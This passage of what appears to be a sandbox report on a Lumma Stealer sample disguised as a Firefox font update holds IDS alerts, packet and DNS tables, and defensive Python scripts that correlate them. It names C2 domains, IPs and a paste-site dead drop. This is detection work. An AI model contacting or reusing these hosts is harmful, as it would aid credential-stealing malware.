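{"timestamp":"2025-01-28T16:16:57.101132+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49859,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:57.561213+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49859,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2025-01-28T16:16:58.057907+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49865,"dest_ip":"104.26.3.16","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
""".strip().splitlines()

JA3_SID = 2028371  # the weak, fingerprint-only signature in the table


def parse_eve_alerts(lines):
    """Yield (timestamp, flow_key, sid, signature, severity) per alert record.
    Suricata writes offsets as +HHMM, which strptime's %z accepts."""
    for line in lines:
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        ts = datetime.strptime(rec["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        flow = (rec["src_ip"], rec["src_port"], rec["dest_ip"], rec["dest_port"], rec["proto"])
        a = rec["alert"]
        yield ts, flow, a["signature_id"], a["signature"], a["severity"]


def correlate_flows(lines):
    """Group alerts by 5-tuple. A flow is 'escalated' when the JA3 hit and a
    severity-1 signature fired on the same connection (author's heuristic)."""
    flows = defaultdict(list)
    for ts, flow, sid, sig, sev in parse_eve_alerts(lines):
        flows[flow].append((ts, sid, sig, sev))
    summary = {}
    for flow, hits in flows.items():
        hits.sort()  # chronological; ties broken by SID
        sids = {sid for _, sid, _, _ in hits}
        sevs = [sev for *_, sev in hits]
        summary[flow] = {
            "first_seen": hits[0][0],
            "last_seen": hits[-1][0],
            "alerts": len(hits),
            "min_severity": min(sevs),  # Suricata: 1 is most severe
            "escalated": JA3_SID in sids and 1 in sevs,
            "signatures": [sig for _, _, sig, _ in hits],
        }
    return summary


def destinations_with_high_severity(summary):
    """Destination IPs that carried at least one severity-1 alert."""
    return sorted({flow[2] for flow, s in summary.items() if s["min_severity"] == 1})


if __name__ == "__main__":
    result = correlate_flows(EVE_LINES)
    for (src, sport, dst, dport, proto), s in sorted(result.items(), key=lambda kv: kv[1]["first_seen"]):
        tag = "ESCALATED" if s["escalated"] else "ja3-only" if s["min_severity"] == 3 else "high"
        print(f"{src}:{sport} -> {dst}:{dport}/{proto}  {s['alerts']} alert(s)  {tag}")
    print("severity-1 destinations:", destinations_with_high_severity(result))
```

Run stand-alone it lists nine flows: five escalate (client ports 49734, 49736, 49752, 49773, 49859), four stay JA3-only (49738, 49743, 49744 and 49865, the last to 104.26.3.16). The caveat this makes visible is that the JA3 rule alone is severity 3 and fires on every TLS handshake from this client, so an alert on it is not actionable by itself; the flow-level correlation with the Lumma signatures is what separates C2 traffic from benign connections sharing the same TLS stack, and since 104.21.0.0/16 and 104.26.0.0/16 are Cloudflare-fronted ranges, blocking those IPs alone would also hit unrelated sites.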
                                                                                                                                                                  • Total Packets: 112
                                                                                                                                                                  • 443 (HTTPS)
                                                                                                                                                                  • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2025 16:15:57.477778912 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:57.477822065 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:57.478013039 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:57.497462988 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:57.497498035 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:57.972676039 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:57.972872972 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:57.976839066 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:57.976876020 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:57.977258921 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.019187927 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.040186882 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.040254116 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.040333033 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.771898031 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.772011042 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.775079012 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.780647993 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.780684948 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.780730963 CET | 49734 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.780764103 CET | 443 | 49734 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.811094999 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.811121941 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:58.811242104 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.811567068 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:58.811584949 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.294658899 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.294729948 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.296000004 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.296010971 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.296260118 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.297472000 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.297498941 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.297552109 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782406092 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782489061 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782527924 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782563925 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782591105 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.782615900 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782640934 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.782933950 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.782980919 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.782989979 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.783217907 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.783278942 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.783288002 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.787256002 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.787305117 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.787350893 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.787358999 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.787638903 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.870683908 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.870763063 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.870848894 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.870896101 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.870942116 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.871129990 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.871145964 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:15:59.871160030 CET | 49736 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:15:59.871165991 CET | 443 | 49736 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:00.558666945 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:00.558710098 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:00.558850050 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:00.559216976 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:00.559232950 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:01.038968086 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:01.039050102 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:01.040450096 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:01.040462017 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:01.040726900 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:01.042337894 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:01.042519093 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:01.042550087 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:01.042646885 CET | 49738 | 443 | 192.168.2.4 | 104.21.60.241
Jan 28, 2025 16:16:01.042655945 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:13.226144075 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
Jan 28, 2025 16:16:13.226250887 CET | 443 | 49738 | 104.21.60.241 | 192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.226315022 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.232762098 CET49738443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.232778072 CET44349738104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.366518974 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.366544008 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.366630077 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.366911888 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.366923094 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.829804897 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.829900026 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.831145048 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.831166029 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.831440926 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:13.841021061 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.841182947 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:13.841227055 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809106112 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809254885 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:25.809343100 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:25.809528112 CET49743443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:25.809551954 CET44349743104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.202224016 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202272892 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.202379942 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202706099 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.202718973 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.672157049 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.672332048 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.676156044 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.676172972 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.676520109 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.677748919 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677802086 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677834034 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:26.677894115 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:26.677902937 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.855979919 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.856051922 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:38.856122971 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:38.856234074 CET49744443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:38.856256962 CET44349744104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:39.699850082 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.699884892 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:39.699944019 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.700242043 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:39.700258970 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.165772915 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.165942907 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.167100906 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.167119026 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.167381048 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.168739080 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.168767929 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.168781996 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931557894 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931663036 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:40.931768894 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.931941986 CET49752443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:40.931962967 CET44349752104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:42.577606916 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.577646971 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:42.577725887 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.578025103 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:42.578039885 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.058063984 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.058157921 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.059923887 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.059947014 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.060893059 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.062725067 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063473940 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063543081 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.063672066 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063719988 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.063886881 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.063929081 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064285994 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064338923 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064524889 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064578056 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064785957 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064846039 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.064867020 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.064881086 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.065073967 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065114021 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.065151930 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065361023 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.065402985 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.073697090 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.076596975 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.076654911 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:43.076709032 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.076760054 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.077455997 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:43.078059912 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495273113 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495373964 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.495482922 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.495583057 CET49773443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.495625973 CET44349773104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.631604910 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.631650925 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:56.631726027 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.631985903 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:56.632004976 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.101037979 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.101131916 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.140688896 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.140749931 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.141047955 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.149715900 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.149771929 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.149925947 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561250925 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561501980 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561575890 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561688900 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561707973 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.561718941 CET49859443192.168.2.4104.21.60.241
                                                                                                                                                                  Jan 28, 2025 16:16:57.561724901 CET44349859104.21.60.241192.168.2.4
                                                                                                                                                                  Jan 28, 2025 16:16:57.573004961 CET49865443192.168.2.4104.26.3.16
Jan 28, 2025 16:16:57.573091984 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:57.573194981 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:57.573499918 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:57.573535919 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.057782888 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.057907104 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.059489965 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.059508085 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.059854031 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.061459064 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.107325077 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.361649036 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.361779928 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.361843109 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.361880064 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.361977100 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.362035990 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.362051010 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.362169027 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.362238884 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.362329960 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.362361908 CET    443    49865    104.26.3.16    192.168.2.4
Jan 28, 2025 16:16:58.362389088 CET    49865  443      192.168.2.4    104.26.3.16
Jan 28, 2025 16:16:58.362404108 CET    443    49865    104.26.3.16    192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 28, 2025 16:15:57.076904058 CET  55701        53         192.168.2.4  1.1.1.1
Jan 28, 2025 16:15:57.423588991 CET  53           55701      1.1.1.1      192.168.2.4
Jan 28, 2025 16:16:57.564513922 CET  57243        53         192.168.2.4  1.1.1.1
Jan 28, 2025 16:16:57.572319031 CET  53           57243      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name               Type            Class        DNS over HTTPS
Jan 28, 2025 16:15:57.076904058 CET  192.168.2.4  1.1.1.1  0x7a76    Standard query (0)  traveladdicts.top  A (IP address)  IN (0x0001)  false
Jan 28, 2025 16:16:57.564513922 CET  192.168.2.4  1.1.1.1  0xa0e5    Standard query (0)  rentry.co          A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name               CName  Address         Type            Class        DNS over HTTPS
Jan 28, 2025 16:15:57.423588991 CET  1.1.1.1    192.168.2.4  0x7a76    No error (0)  traveladdicts.top  -      104.21.60.241   A (IP address)  IN (0x0001)  false
Jan 28, 2025 16:15:57.423588991 CET  1.1.1.1    192.168.2.4  0x7a76    No error (0)  traveladdicts.top  -      172.67.202.141  A (IP address)  IN (0x0001)  false
Jan 28, 2025 16:16:57.572319031 CET  1.1.1.1    192.168.2.4  0xa0e5    No error (0)  rentry.co          -      104.26.3.16     A (IP address)  IN (0x0001)  false
Jan 28, 2025 16:16:57.572319031 CET  1.1.1.1    192.168.2.4  0xa0e5    No error (0)  rentry.co          -      104.26.2.16     A (IP address)  IN (0x0001)  false
Jan 28, 2025 16:16:57.572319031 CET  1.1.1.1    192.168.2.4  0xa0e5    No error (0)  rentry.co          -      172.67.75.40    A (IP address)  IN (0x0001)  false

Contacted domains:
• traveladdicts.top
• rentry.co
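The DNS answers above and the TCP/HTTP rows around them can be tied together to read each destination address as the name the sample resolved for it, and to flag a lookup of a paste service (the report summary lists the rentry.co contact as a likely C2 dead drop). The following Python is an added example and not part of the Joe Sandbox report: the DNS answers, the three outbound connections and their times are transcribed from this report, while the paste-service watchlist and the "no prior lookup" check are this example's own assumptions.

```python
"""
Added example, not part of the Joe Sandbox report: correlate the DNS answers
with the connections the sample then opened, flag paste-service names, and
report destinations that were contacted without any earlier lookup.
Rows are transcribed from the report; the watchlist is an assumption.
"""
from __future__ import annotations
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))   # packet timestamps in the report are given in CET

# DNS answer rows transcribed from the report: (Trans ID, name, address, answer time).
DNS_ANSWERS = [
    ("0x7a76", "traveladdicts.top", "104.21.60.241",  datetime(2025, 1, 28, 16, 15, 57, 423589, CET)),
    ("0x7a76", "traveladdicts.top", "172.67.202.141", datetime(2025, 1, 28, 16, 15, 57, 423589, CET)),
    ("0xa0e5", "rentry.co",         "104.26.3.16",    datetime(2025, 1, 28, 16, 16, 57, 572319, CET)),
    ("0xa0e5", "rentry.co",         "104.26.2.16",    datetime(2025, 1, 28, 16, 16, 57, 572319, CET)),
    ("0xa0e5", "rentry.co",         "172.67.75.40",   datetime(2025, 1, 28, 16, 16, 57, 572319, CET)),
]

# Outbound connections: (source port, destination IP, destination port, start time).
# The two HTTP sessions are timestamped in UTC by the report; the TLS flow on port
# 49865 uses the earliest packet of that flow shown in the TCP table.
CONNECTIONS = [
    (49734, "104.21.60.241", 443, datetime(2025, 1, 28, 15, 15, 58, tzinfo=timezone.utc)),
    (49736, "104.21.60.241", 443, datetime(2025, 1, 28, 15, 15, 59, tzinfo=timezone.utc)),
    (49865, "104.26.3.16",   443, datetime(2025, 1, 28, 16, 16, 57, 573092, CET)),
]

# Assumption: a short watchlist of paste / dead-drop hosts; extend as needed.
PASTE_SERVICES = {"rentry.co"}


def lookup_names(dns_answers, ip: str, at_iso: str) -> list[str]:
    """Names that resolved to `ip` in an answer received no later than `at_iso`."""
    at = datetime.fromisoformat(at_iso)
    return sorted({name for _, name, addr, when in dns_answers if addr == ip and when <= at})


def annotate_connections(dns_answers, connections) -> list[dict]:
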